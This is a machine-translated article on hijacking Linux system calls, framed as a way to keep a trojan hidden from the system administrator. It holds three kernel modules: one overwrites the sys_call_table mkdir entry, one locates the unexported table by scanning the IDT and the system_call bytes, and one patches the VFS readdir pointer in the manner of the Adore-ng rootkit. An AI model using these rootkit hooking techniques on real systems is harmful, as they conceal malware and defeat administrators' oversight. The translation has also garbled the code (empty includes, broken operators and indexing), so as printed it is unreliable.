About System Call hijacking [original]

For details about System Call hijacking [original]-general Linux technology-Linux programming and kernel, refer to the following. About System Call hijacking

If a trojan is to be hidden, it is not discovered by the system administrator. It seems necessary to intercept system calls. In most cases
Modify the system call table to hijack the system call.

The following is a typical module for intercepting system calls:

Module 1:
# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Include

MODULE_LICENSE ("GPL ");

Extern void * sys_call_table [];/* sys_call_table is exported, so we can access
It. But in some system this will cause problem */
Int (* orig_mkdir) (const char * path);/* the original systemcall */
Int hacked_mkdir (const char * path)
{
Return 0;/* everything is OK, but he new systemcall
Does nothing */
}
Int init_module (void)/* module setup */
{
Orig_mkdir = sys_call_table [SYS_mkdir];
Sys_call_table [SYS_mkdir] = hacked_mkdir;
Return 0;
}
Void cleanup_module (void)/* module shutdown */
{
Sys_call_table [SYS_mkdir] = orig_mkdir;/* set mkdir syscall to the origal
One */
}

The premise of using this method to implement system calling is that the system must export the sys_call_table kernel symbol,
In the 2.6 kernel and some 2.4 kernel systems (such as redhat as 3), sys_call_table is no longer exported. That is
The system call table address cannot be obtained through the simple extern void * sys_call_table []; in the module.

Fortunately, even if the kernel does not export sys_call_table, you can find its address in the memory. below is its actual
Current Method:

Module 2: (2.4 and 2.6 kernel Tests passed)
# Include
# Include
# Include
# Include
# Include

MODULE_LICENSE ("GPL ");
MODULE_AUTHOR ("xunil @ bmy ");
MODULE_DESCRIPTION ("Different from others, this module
Automatically locate the entry of sys_call_table! ");

Unsigned long * sys_call_table = NULL;
Asmlinkage int (* orig_mkdir) (const char *, int );

Struct _ idt
{
Unsigned short offset_low, segment_sel;
Unsigned char reserved, flags;
Unsigned short offset_high;
};

Unsigned long * getscTable (){
Unsigned char idtr [6], * shell, * sort;
Struct _ idt * idt;
Unsigned long system_call, sct;
Unsigned short offset_low, offset_high;
Char * p;
Int I;



/* Get the interrupt descriptor table */


_ Asm _ ("sidt % 0": "= m" (idtr ));


/* Get the address of system_call */
Idt = (struct _ idt *) (* (unsigned long *) & idtr [2] + 8*0x80 );
Offset_low = idt-> offset_low;
Offset_high = idt-> offset_high;
System_call = (offset_high <16) | offset_low;


Shell = (char *) system_call;
Sort = "\ xff \ x14 \ x85 ";


/* Get the address of sys_call_table */

For (I = 0; I <(100-2); I ++)
If (shell = Sort [0] & shell [I + 1] = sort [1] & shell [I + 2] = sort [2])
Break;



P = & shell;
P + = 3;
Sct = * (unsigned long *) p;

Return (unsigned long *) (sct );
}

Asmlinkage int hacked_mkdir (const char * pathname, int mode ){
Printk ("PID % d called sys_mkdir! \ N ", current-> pid );
Return orig_mkdir (pathname, mode );
}

Static int _ init find_init (void ){
Sys_call_table = getscTable ();
Orig_mkdir = (int (*) (const char *, int) sys_call_table [_ NR_mkdir];
Sys_call_table [_ NR_mkdir] = (unsigned long) hacked_mkdir;
Return 0;
}

Static void _ exit find_cleanup (void ){
Sys_call_table [_ NR_mkdir] = (unsigned long) orig_mkdir;
}

Module_init (find_init );
Module_exit (find_cleanup );

GetscTable () is a function used to find the sys_call_table address in the memory.
Every system call enters the core through an int 0x80 interrupt. The Interrupt Descriptor Table calls the interrupt service program and the interrupt vector.
. For system calls, the operating system calls the system_call to interrupt the service program. System_call letter
Find and call the corresponding system call service routine in the system call table based on the system call number. Pointing the idtr register
Start address of the Interrupt Descriptor Table, starting with the command "_ asm _ (" sidt % 0 ":" = m "(idtr )".
Starting address. From the pointer obtained in this command, you can obtain the int 0x80 interrupt server descriptor location, and then calculate
The address of the system_call function. Decompile the system_call function and you can see that in the system_call function
Call sys_call_table to call the system call function. Therefore, you only need to find the call in system_call
The machine command of the sys_call_table (, eax, 4) command can obtain the entry address of the system call table.

Adore-ng rootkit provides a new method for intercepting system calls related to the file system. Simply put
This method intercepts system calls by modifying the function jump table of the vfs file system.
The implementation method is as follows:

Module 3: (2.4 and 2.6 kernel Tests passed)
# Include
# Include
# Include
# Include
# Include
# Include

MODULE_AUTHOR ("xunil @ BMY ");
MODULE_DESCRIPTION ("By utilizing the VFS filesystem, this module can capture
System CILS .");
MODULE_LICENSE ("GPL ");

Char * root_fs = "/";

Typedef int (* readdir_t) (struct file *, void *, filldir_t );
Readdir_t orig_root_readdir = NULL;

Int myreaddir (struct file * fp, void * buf, filldir_t filldir)
{
Int r;
Printk ("<1> You got me partner! \ N ");
R = orig_root_readdir (fp, buf, filldir );
Return r;
}

Int patch_vfs (const char * p, readdir_t * orig_readdir, readdir_t new_readdir)
{
Struct file * filep;
Filep = filp_open (p, O_RDONLY, 0 );
If (IS_ERR (filep ))
Return-1;
If (orig_readdir)
* Orig_readdir = filep-> f_op-> readdir;

Filep-> f_op-> readdir = new_readdir;
Filp_close (filep, 0 );
Return 0;
}

Int unpatch_vfs (const char * p, readdir_t orig_readdir)
{
Struct file * filep;
Filep = filp_open (p, O_RDONLY, 0 );
If (IS_ERR (filep ))
Return-1;
Filep-> f_op-> readdir = orig_readdir;
Filp_close (filep, 0 );
Return 0;
}

Static int patch_init (void)
{
Patch_vfs (root_fs, & orig_root_readdir, myreaddir );
Printk ("<1> VFS is patched! \ N ");
Return 0;
}
Static void patch_cleanup (void)
{
Unpatch_vfs (root_fs, orig_root_readdir );
Printk ("<1> VFS is unpatched! \ N ");
}
Module_init (patch_init );
Module_exit (patch_cleanup );